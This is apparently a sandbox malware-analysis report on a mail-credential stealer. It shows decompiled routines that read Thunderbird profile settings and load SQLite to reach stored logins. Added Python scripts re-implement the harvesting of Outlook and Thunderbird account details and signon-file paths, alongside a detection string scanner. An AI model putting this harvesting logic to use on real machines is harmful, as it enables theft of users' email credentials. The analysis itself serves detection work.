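  <SMTP_Email_Address type="SZ">alice@example.test</SMTP_Email_Address>
  <SMTP_Port type="DWORD">000001d1</SMTP_Port>
</MessageAccount>
"""


def _to_int(text: str) -> int:
    """Assumption: DWORD values are eight hex digits; anything else is read as decimal."""
    text = text.strip()
    if re.fullmatch(r"[0-9A-Fa-f]{8}", text):
        return int(text, 16)
    return int(text, 10)


def is_dpapi_blob(blob: bytes) -> bool:
    """True when the bytes carry the CryptProtectData header, i.e. need the user's DPAPI key."""
    return blob.startswith(DPAPI_BLOB_PREFIX)


def collect_account(xml_text: str) -> dict:
    """Fill a record shaped like the sample's: one incoming-server slot shared by
    POP3/IMAP/NNTP and one SMTP slot, mirroring the shared offsets in the decompiled code."""
    root = ET.fromstring(xml_text)
    record = {"incoming": {}, "smtp": {}}
    for elem in root:
        proto, _, field = elem.tag.partition("_")
        if proto not in PROTOCOLS:
            continue  # e.g. Account_Name: not matched by the strcmp chain
        slot = record["smtp"] if proto == "SMTP" else record["incoming"]
        if proto != "SMTP":
            slot["protocol"] = proto  # the sample records a type tag (the 4 / 3 constants) instead
        value = (elem.text or "").strip()
        if field in STRING_FIELDS:
            slot[field] = value[:0xFF]  # same length bound as E004060D0(0xff, ...)
        elif field in INT_FIELDS:
            slot[field] = _to_int(value)
        elif field == BLOB_FIELD:
            blob = bytes.fromhex(value)
            slot[field] = blob  # the sample passes this on to E00410525; we only classify it
            slot["password_is_dpapi"] = is_dpapi_blob(blob)
    return record


def scan_for_markers(buf: bytes) -> list:
    """Return the marker strings present in a buffer (a dumped process image, a dropped file)."""
    return [m for m in MARKER_STRINGS if m.encode("ascii") in buf]


if __name__ == "__main__":
    rec = collect_account(SAMPLE_OEACCOUNT)
    for slot, fields in rec.items():
        print(slot, {k: (v.hex() if isinstance(v, bytes) else v) for k, v in fields.items()})
    print("markers present:", scan_for_markers(SAMPLE_OEACCOUNT.encode()))
```

Running the script against the constructed document reproduces what the sample would have assembled for this account: an incoming POP3 record (server, user name, port 995, secure flag, a DPAPI-protected password) and an SMTP record with the address and port 465. The scanner is the part worth keeping: the same names, searched in a memory dump or in the unpacked payload, are a cheap indicator that the MailPassView collector is present even when the binary's own strings are obfuscated until runtime.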
Address column of the decompiled function above (instruction addresses 0x004106be to 0x00410a14); the instruction text it was aligned with did not survive extraction.
                                                                                                                                                    0x00410a1d
                                                                                                                                                    0x00410a2b
                                                                                                                                                    0x00410a31
                                                                                                                                                    0x00410a31
                                                                                                                                                    0x00410a37
                                                                                                                                                    0x00410a3c
                                                                                                                                                    0x00410a3d
                                                                                                                                                    0x00410a46
                                                                                                                                                    0x00410a6a
                                                                                                                                                    0x00410a7c
                                                                                                                                                    0x00410a48
                                                                                                                                                    0x00410a48
                                                                                                                                                    0x00410a4d
                                                                                                                                                    0x00410a4e
                                                                                                                                                    0x00410a57
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00410a59
                                                                                                                                                    0x00410a59
                                                                                                                                                    0x00410a5e
                                                                                                                                                    0x00410a5f
                                                                                                                                                    0x00410a68
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00410a68
                                                                                                                                                    0x00410a57
                                                                                                                                                    0x00410a89

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcmp$_stricmp$memcpystrlen
                                                                                                                                                    • String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                    • API String ID: 1113949926-2499304436
                                                                                                                                                    • Opcode ID: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                                                                                                    • Instruction ID: 03d5d7842382467f3947e80262f6a1f2e973b0058f56c731c8fd5b97bb90a946
                                                                                                                                                    • Opcode Fuzzy Hash: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                                                                                                    • Instruction Fuzzy Hash: D391517220870569E624B7329C02FD773E8AF9032DF21052FF55BE61D2EEADB981465C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                    			E0040C7CF(intOrPtr __ecx, void* __edx, char* _a4, char* _a8) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                    				char _v16;
                                                                                                                                                    				void _v271;
                                                                                                                                                    				char _v272;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				int _t64;
                                                                                                                                                    				int _t66;
                                                                                                                                                    				int _t68;
                                                                                                                                                    				int _t69;
                                                                                                                                                    				int _t72;
                                                                                                                                                    				int _t85;
                                                                                                                                                    				void* _t91;
                                                                                                                                                    				void* _t132;
                                                                                                                                                    				char* _t133;
                                                                                                                                                    				char* _t135;
                                                                                                                                                    				char* _t137;
                                                                                                                                                    				char* _t139;
                                                                                                                                                    				intOrPtr _t151;
                                                                                                                                                    				int _t153;
                                                                                                                                                    				int _t154;
                                                                                                                                                    				void* _t155;
                                                                                                                                                    
                                                                                                                                                    				_t132 = __edx;
                                                                                                                                                    				_v12 = __ecx;
                                                                                                                                                    				_v272 = 0;
                                                                                                                                                    				memset( &_v271, 0, 0xff);
                                                                                                                                                    				_t133 = "mail.account.account";
                                                                                                                                                    				_t64 = strlen(_t133);
                                                                                                                                                    				_t148 = _t64;
                                                                                                                                                    				_t134 = _a4;
                                                                                                                                                    				if(strncmp(_a4, _t133, _t64) != 0) {
                                                                                                                                                    					_v8 = _v8 & 0x00000000;
                                                                                                                                                    				} else {
                                                                                                                                                    					_v8 = E0040C748(_t134,  &_v16, _t148);
                                                                                                                                                    				}
                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                    					_push("identities");
                                                                                                                                                    					_push(_v8);
                                                                                                                                                    					L004115B2();
                                                                                                                                                    					if(_t91 == 0) {
                                                                                                                                                    						_t17 = _t155 + 0x604; // 0x604
                                                                                                                                                    						E004060D0(0xff, _t17, _a8);
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				_t135 = "mail.server";
                                                                                                                                                    				_t66 = strlen(_t135);
                                                                                                                                                    				_t149 = _t66;
                                                                                                                                                    				_t136 = _a4;
                                                                                                                                                    				if(strncmp(_a4, _t135, _t66) != 0) {
                                                                                                                                                    					_v8 = _v8 & 0x00000000;
                                                                                                                                                    				} else {
                                                                                                                                                    					_v8 = E0040C6F3(_t149, _t136,  &_v272);
                                                                                                                                                    				}
                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                    					_t85 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
                                                                                                                                                    					_push("username");
                                                                                                                                                    					_push(_v8);
                                                                                                                                                    					_t154 = _t85;
                                                                                                                                                    					L004115B2();
                                                                                                                                                    					if(_t85 == 0) {
                                                                                                                                                    						_t28 = _t154 + 0x204; // 0x204
                                                                                                                                                    						_t85 = E004060D0(0xff, _t28, _a8);
                                                                                                                                                    					}
                                                                                                                                                    					_push("type");
                                                                                                                                                    					_push(_v8);
                                                                                                                                                    					L004115B2();
                                                                                                                                                    					if(_t85 == 0) {
                                                                                                                                                    						_t31 = _t154 + 0x504; // 0x504
                                                                                                                                                    						_t85 = E004060D0(0xff, _t31, _a8);
                                                                                                                                                    					}
                                                                                                                                                    					_push("hostname");
                                                                                                                                                    					_push(_v8);
                                                                                                                                                    					L004115B2();
                                                                                                                                                    					if(_t85 == 0) {
                                                                                                                                                    						_t34 = _t154 + 0x104; // 0x104
                                                                                                                                                    						_t85 = E004060D0(0xff, _t34, _a8);
                                                                                                                                                    					}
                                                                                                                                                    					_push("port");
                                                                                                                                                    					_push(_v8);
                                                                                                                                                    					L004115B2();
                                                                                                                                                    					if(_t85 == 0) {
                                                                                                                                                    						_t85 = atoi(_a8);
                                                                                                                                                    						 *(_t154 + 0x804) = _t85;
                                                                                                                                                    					}
                                                                                                                                                    					_push("useSecAuth");
                                                                                                                                                    					_push(_v8);
                                                                                                                                                    					L004115B2();
                                                                                                                                                    					if(_t85 == 0) {
                                                                                                                                                    						_push("true");
                                                                                                                                                    						_push(_a8);
                                                                                                                                                    						L004115B2();
                                                                                                                                                    						if(_t85 == 0) {
                                                                                                                                                    							 *((intOrPtr*)(_t154 + 0x808)) = 1;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				_t137 = "mail.identity";
                                                                                                                                                    				_t68 = strlen(_t137);
                                                                                                                                                    				_t150 = _t68;
                                                                                                                                                    				_t138 = _a4;
                                                                                                                                                    				_t69 = strncmp(_a4, _t137, _t68);
                                                                                                                                                    				if(_t69 != 0) {
                                                                                                                                                    					_v8 = _v8 & 0x00000000;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t69 = E0040C6F3(_t150, _t138,  &_v272);
                                                                                                                                                    					_v8 = _t69;
                                                                                                                                                    				}
                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                    					_t69 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
                                                                                                                                                    					_push("useremail");
                                                                                                                                                    					_push(_v8);
                                                                                                                                                    					_t153 = _t69;
                                                                                                                                                    					L004115B2();
                                                                                                                                                    					if(_t69 == 0) {
						_t51 = _t153 + 0x404; // 0x404
						_t69 = E004060D0(0xff, _t51, _a8);
					}
					_push("fullname");
					_push(_v8);
					L004115B2();
					if(_t69 == 0) {
						_t54 = _t153 + 4; // 0x4
						_t69 = E004060D0(0xff, _t54, _a8);
					}
				}
				_push("signon.signonfilename");
				_push(_a4);
				L004115B2();
				if(_t69 == 0) {
					_t151 = _v12;
					_t139 = _t151 + 0x245;
					_t152 = _t151 + 0x140;
					_t72 = strlen(_t151 + 0x140);
					_t60 = strlen(_a8) + 1; // 0x1
					if(_t72 + _t60 >= 0x104) {
						 *_t139 = 0;
					} else {
						E004062AD(_t139, _t152, _a8);
					}
				}
				return 1;
			}

Disassembly addresses 0x0040c7cf - 0x0040ca7a (instruction text not present in this export)

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040C7F4
                                                                                                                                                    • strlen.MSVCRT ref: 0040C7FF
                                                                                                                                                    • strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C80C
                                                                                                                                                    • _stricmp.MSVCRT(00000000,server), ref: 0040C849
                                                                                                                                                    • _stricmp.MSVCRT(00000000,identities), ref: 0040C86B
                                                                                                                                                    • strlen.MSVCRT ref: 0040C88B
                                                                                                                                                    • strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040C898
                                                                                                                                                    • _stricmp.MSVCRT(00000000,username,00000000), ref: 0040C8E1
                                                                                                                                                    • _stricmp.MSVCRT(00000000,type,00000000), ref: 0040C903
                                                                                                                                                    • _stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040C925
                                                                                                                                                    • _stricmp.MSVCRT(00000000,port,00000000), ref: 0040C947
                                                                                                                                                    • atoi.MSVCRT ref: 0040C955
                                                                                                                                                      • Part of subcall function 0040C748: memset.MSVCRT ref: 0040C77E
                                                                                                                                                      • Part of subcall function 0040C748: memcpy.MSVCRT ref: 0040C7A0
                                                                                                                                                      • Part of subcall function 0040C748: atoi.MSVCRT ref: 0040C7B4
                                                                                                                                                    • _stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040C969
                                                                                                                                                    • _stricmp.MSVCRT(?,true,00000000), ref: 0040C97C
                                                                                                                                                    • strlen.MSVCRT ref: 0040C997
                                                                                                                                                    • strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040C9A4
                                                                                                                                                    • _stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040C9E9
                                                                                                                                                    • _stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CA0B
                                                                                                                                                    • _stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CA2A
                                                                                                                                                    • strlen.MSVCRT ref: 0040CA45
                                                                                                                                                    • strlen.MSVCRT ref: 0040CA4F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
                                                                                                                                                    • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                                                                                    • API String ID: 736090197-593045482
                                                                                                                                                    • Opcode ID: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                                                                                                                    • Instruction ID: 8e23c8f9271997a3be880b93158be8956f510041fead3e1da2e0ecaa9a645c54
                                                                                                                                                    • Opcode Fuzzy Hash: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                                                                                                                    • Instruction Fuzzy Hash: E271C972504204FADF10EB65CC42BDE77A6DF50329F20426BF506B21E1EB79AF819A5C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
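What the routine above harvests from a Mozilla/Thunderbird prefs.js, re-implemented in Python as an added example (this is not code from the sample or from Joe Sandbox). The decompiled function matches the pref-name prefixes mail.account.account, mail.server and mail.identity with strncmp, compares the trailing key (server, identities, username, type, hostname, port, useSecAuth, useremail, fullname) with _stricmp, converts port with atoi and useSecAuth with a comparison against "true", records signon.signonfilename, and refuses to build the signon file path when the profile directory plus file name would reach 0x104 (MAX_PATH) bytes. The prefs.js content below is constructed for the example; the profile directory passed to signon_path() and the way it is joined to the file name are assumptions, because the helper E004062AD that performs the join is not shown on the page.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

MAX_PATH = 0x104  # the limit the decompiled routine checks before joining the signon path

# Constructed prefs.js excerpt in the user_pref("name", value); format that
# Thunderbird writes. Host names, ids and addresses are made up for this example.
SAMPLE_PREFS = r'''
# Mozilla User Preferences
user_pref("mail.account.account1.identities", "id1,id2");
user_pref("mail.account.account1.server", "server1");
user_pref("mail.account.account2.server", "server2");
user_pref("mail.identity.id1.fullname", "Example User");
user_pref("mail.identity.id1.useremail", "user@example.invalid");
user_pref("mail.identity.id2.useremail", "alias@example.invalid");
user_pref("mail.server.server1.hostname", "imap.example.invalid");
user_pref("mail.server.server1.port", 993);
user_pref("mail.server.server1.type", "imap");
user_pref("mail.server.server1.useSecAuth", true);
user_pref("mail.server.server1.userName", "user@example.invalid");
user_pref("mail.server.server2.hostname", "Local Folders");
user_pref("mail.server.server2.type", "none");
user_pref("signon.SignonFileName", "signons.sqlite");
'''

PREF_RE = re.compile(r'^\s*user_pref\("([^"]+)",\s*(.+?)\);\s*$')


@dataclass
class MailServer:
    hostname: str = ''
    port: int = 0
    type: str = ''
    username: str = ''
    use_sec_auth: bool = False


@dataclass
class MailIdentity:
    fullname: str = ''
    useremail: str = ''


@dataclass
class MailAccount:
    server: str = ''
    identities: List[str] = field(default_factory=list)


def _unquote(raw: str) -> str:
    raw = raw.strip()
    return raw[1:-1] if len(raw) >= 2 and raw[0] == raw[-1] == '"' else raw


def parse_prefs(text: str):
    """Return (accounts, servers, identities, signon_file) from prefs.js text."""
    accounts: Dict[str, MailAccount] = {}
    servers: Dict[str, MailServer] = {}
    identities: Dict[str, MailIdentity] = {}
    signon_file: Optional[str] = None
    for line in text.splitlines():
        m = PREF_RE.match(line)
        if not m:
            continue
        name, value = m.group(1), _unquote(m.group(2))
        parts = name.split('.')
        key = parts[-1].lower()  # _stricmp in the sample: trailing key matches case-insensitively
        # strncmp on the prefix is case-sensitive; the account/server/identity id is parts[2]
        if name.startswith('mail.account.account') and len(parts) == 4:
            acc = accounts.setdefault(parts[2], MailAccount())
            if key == 'server':
                acc.server = value
            elif key == 'identities':
                acc.identities = [i.strip() for i in value.split(',') if i.strip()]
        elif name.startswith('mail.server.') and len(parts) == 4:
            srv = servers.setdefault(parts[2], MailServer())
            if key == 'username':
                srv.username = value
            elif key == 'type':
                srv.type = value
            elif key == 'hostname':
                srv.hostname = value
            elif key == 'port':
                srv.port = int(value) if value.isdigit() else 0  # atoi semantics
            elif key == 'usesecauth':
                srv.use_sec_auth = value.lower() == 'true'  # _stricmp(..., "true")
        elif name.startswith('mail.identity.') and len(parts) == 4:
            ident = identities.setdefault(parts[2], MailIdentity())
            if key == 'useremail':
                ident.useremail = value
            elif key == 'fullname':
                ident.fullname = value
        elif name.lower() == 'signon.signonfilename':
            signon_file = value
    return accounts, servers, identities, signon_file


def signon_path(profile_dir: str, signon_file: str) -> str:
    # Mirrors the guard in the decompiled code: strlen(dir) + strlen(file) + 1 >= 0x104
    # leaves the destination empty instead of writing past the 0x104-byte buffer.
    if len(profile_dir) + len(signon_file) + 1 >= MAX_PATH:
        return ''
    # Assumption: the unshown helper E004062AD joins the two strings; a backslash is
    # inserted here only when the directory does not already end with one.
    sep = '' if profile_dir.endswith('\\') else '\\'
    return profile_dir + sep + signon_file


def harvest(text: str, profile_dir: str) -> List[dict]:
    """Join account -> server -> identities into one record per account."""
    accounts, servers, identities, signon_file = parse_prefs(text)
    rows = []
    for acc_id in sorted(accounts):
        acc = accounts[acc_id]
        srv = servers.get(acc.server, MailServer())
        rows.append({
            'account': acc_id,
            'hostname': srv.hostname,
            'port': srv.port,
            'type': srv.type,
            'username': srv.username,
            'secure_auth': srv.use_sec_auth,
            'emails': [identities[i].useremail for i in acc.identities if i in identities],
            'signon_file': signon_path(profile_dir, signon_file or ''),
        })
    return rows


if __name__ == '__main__':
    for row in harvest(SAMPLE_PREFS, 'C:\\Profile\\abc.default'):
        print(row)
```

The case-insensitive key comparison is what makes the sample's _stricmp calls work against real profiles, where Thunderbird writes userName and signon.SignonFileName in mixed case. prefs.js itself yields only host, port, protocol type, user name and the name of the signon file; the stored passwords live in that signon file, which is why the routine records its path for a later step.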

                                                                                                                                                    C-Code - Quality: 100%
			E0040F64B(intOrPtr* __esi, char* _a4) {
				void _v283;
				char _v284;
				void _v547;
				char _v548;
				struct HINSTANCE__* _t45;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t68;
				CHAR* _t79;
				intOrPtr* _t81;

				_t81 = __esi;
				if( *((intOrPtr*)(__esi + 0x24)) != 0) {
					L14:
					return 1;
				}
				_v284 = 0;
				memset( &_v283, 0, 0x117);
				if(_a4 == 0) {
					E0040F435( &_v284);
				} else {
					strcpy( &_v284, _a4);
                                                                                                                                                    				}
                                                                                                                                                    				if(_v284 == 0) {
                                                                                                                                                    					_t79 = "sqlite3.dll";
                                                                                                                                                    					_t45 = GetModuleHandleA(_t79);
                                                                                                                                                    					 *(_t81 + 0x24) = _t45;
                                                                                                                                                    					if(_t45 != 0) {
                                                                                                                                                    						goto L12;
                                                                                                                                                    					}
                                                                                                                                                    					_t57 = LoadLibraryA(_t79);
                                                                                                                                                    					goto L11;
                                                                                                                                                    				} else {
                                                                                                                                                    					_v548 = 0;
                                                                                                                                                    					memset( &_v547, 0, 0x104);
                                                                                                                                                    					strcpy( &_v548,  &_v284);
                                                                                                                                                    					strcat( &_v284, "\\sqlite3.dll");
                                                                                                                                                    					if(E0040614B( &_v284) == 0) {
                                                                                                                                                    						strcpy( &_v284,  &_v548);
                                                                                                                                                    						strcat( &_v284, "\\mozsqlite3.dll");
                                                                                                                                                    					}
                                                                                                                                                    					_t68 = GetModuleHandleA( &_v284);
                                                                                                                                                    					 *(_t81 + 0x24) = _t68;
                                                                                                                                                    					if(_t68 != 0) {
                                                                                                                                                    						L12:
                                                                                                                                                    						_t46 =  *(_t81 + 0x24);
                                                                                                                                                    						if(_t46 == 0) {
                                                                                                                                                    							return 0;
                                                                                                                                                    						}
                                                                                                                                                    						 *_t81 = GetProcAddress(_t46, "sqlite3_open");
                                                                                                                                                    						 *((intOrPtr*)(_t81 + 4)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_prepare");
                                                                                                                                                    						 *((intOrPtr*)(_t81 + 8)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_step");
                                                                                                                                                    						 *((intOrPtr*)(_t81 + 0xc)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_text");
                                                                                                                                                    						 *((intOrPtr*)(_t81 + 0x10)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int");
                                                                                                                                                    						 *((intOrPtr*)(_t81 + 0x14)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int64");
                                                                                                                                                    						 *((intOrPtr*)(_t81 + 0x18)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_finalize");
                                                                                                                                                    						 *((intOrPtr*)(_t81 + 0x1c)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_close");
                                                                                                                                                    						 *((intOrPtr*)(_t81 + 0x20)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_exec");
                                                                                                                                                    						goto L14;
                                                                                                                                                    					} else {
                                                                                                                                                    						_t57 = LoadLibraryExA( &_v284, 0, 8);
                                                                                                                                                    						L11:
                                                                                                                                                    						 *(_t81 + 0x24) = _t57;
                                                                                                                                                    						goto L12;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040F674
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040F68B
                                                                                                                                                    • memset.MSVCRT ref: 0040F6B8
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6CB
                                                                                                                                                    • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6DC
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F702
                                                                                                                                                    • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F713
                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F722
                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F739
                                                                                                                                                    • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F747
                                                                                                                                                    • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F755
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040F775
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040F781
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040F78E
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040F79B
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040F7A8
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040F7B5
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040F7C2
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040F7CF
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040F7DC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$strcpy$HandleLibraryLoadModulememsetstrcat
                                                                                                                                                    • String ID: \mozsqlite3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                                                                                                    • API String ID: 3567885941-2042458128
                                                                                                                                                    • Opcode ID: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                                                                                                    • Instruction ID: 8fd3bcd04759d815ffa5d5b817f34976dc276f641444eb2ebd63b60ef60fef8a
                                                                                                                                                    • Opcode Fuzzy Hash: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                                                                                                    • Instruction Fuzzy Hash: C9416571940308AACB30AF718D85DCBBBF9AB58705F10497BE246E3550E778E685CF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                    			E0040E4A4(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
                                                                                                                                                    				signed int _v0;
                                                                                                                                                    				intOrPtr _v4;
                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                    				signed int _v28;
                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                    				struct HWND__* _v48;
                                                                                                                                                    				struct HWND__* _v52;
                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                    				struct HDC__* _t169;
                                                                                                                                                    				struct HWND__* _t171;
                                                                                                                                                    				intOrPtr _t223;
                                                                                                                                                    				void* _t224;
                                                                                                                                                    				intOrPtr _t235;
                                                                                                                                                    				struct HWND__* _t237;
                                                                                                                                                    				void* _t240;
                                                                                                                                                    				intOrPtr* _t274;
                                                                                                                                                    				signed int _t275;
                                                                                                                                                    				signed int _t276;
                                                                                                                                                    
                                                                                                                                                    				_t274 = __esi;
                                                                                                                                                    				_t276 = _t275 & 0xfffffff8;
                                                                                                                                                    				E004118A0(0x2198, __ecx);
                                                                                                                                                    				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
                                                                                                                                                    				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
                                                                                                                                                    				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
                                                                                                                                                    				_a20 = GetWindowLongA(_t237, 0xfffffff0);
                                                                                                                                                    				_a24 = GetWindowLongA(_a4, 0xfffffff0);
                                                                                                                                                    				_a96 = GetWindowLongA(_t237, 0xffffffec);
                                                                                                                                                    				_a36 = GetWindowLongA(_a4, 0xffffffec);
                                                                                                                                                    				GetWindowRect(_t237,  &_a100);
                                                                                                                                                    				GetWindowRect(_a4,  &_a60);
                                                                                                                                                    				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
                                                                                                                                                    				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
                                                                                                                                                    				_t240 = _a108 - _a100.x;
                                                                                                                                                    				_a4 = _a4 & 0x00000000;
                                                                                                                                                    				_a28 = _a68 - _a60.x;
                                                                                                                                                    				_a76 = _a112 - _a104;
                                                                                                                                                    				_a40 = _a72 - _a64;
                                                                                                                                                    				_t169 = GetDC( *(__esi + 4));
                                                                                                                                                    				_a16 = _t169;
                                                                                                                                                    				if(_t169 == 0) {
                                                                                                                                                    					L9:
                                                                                                                                                    					_v0 = _v0 & 0x00000000;
                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
                                                                                                                                                    						L12:
                                                                                                                                                    						_t171 = GetDlgItem( *(_t274 + 4), 1);
                                                                                                                                                    						_a36 = _t171;
                                                                                                                                                    						GetWindowRect(_t171,  &_a44);
                                                                                                                                                    						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
                                                                                                                                                    						GetClientRect( *(_t274 + 4),  &_a124);
                                                                                                                                                    						GetWindowRect( *(_t274 + 4),  &_a80);
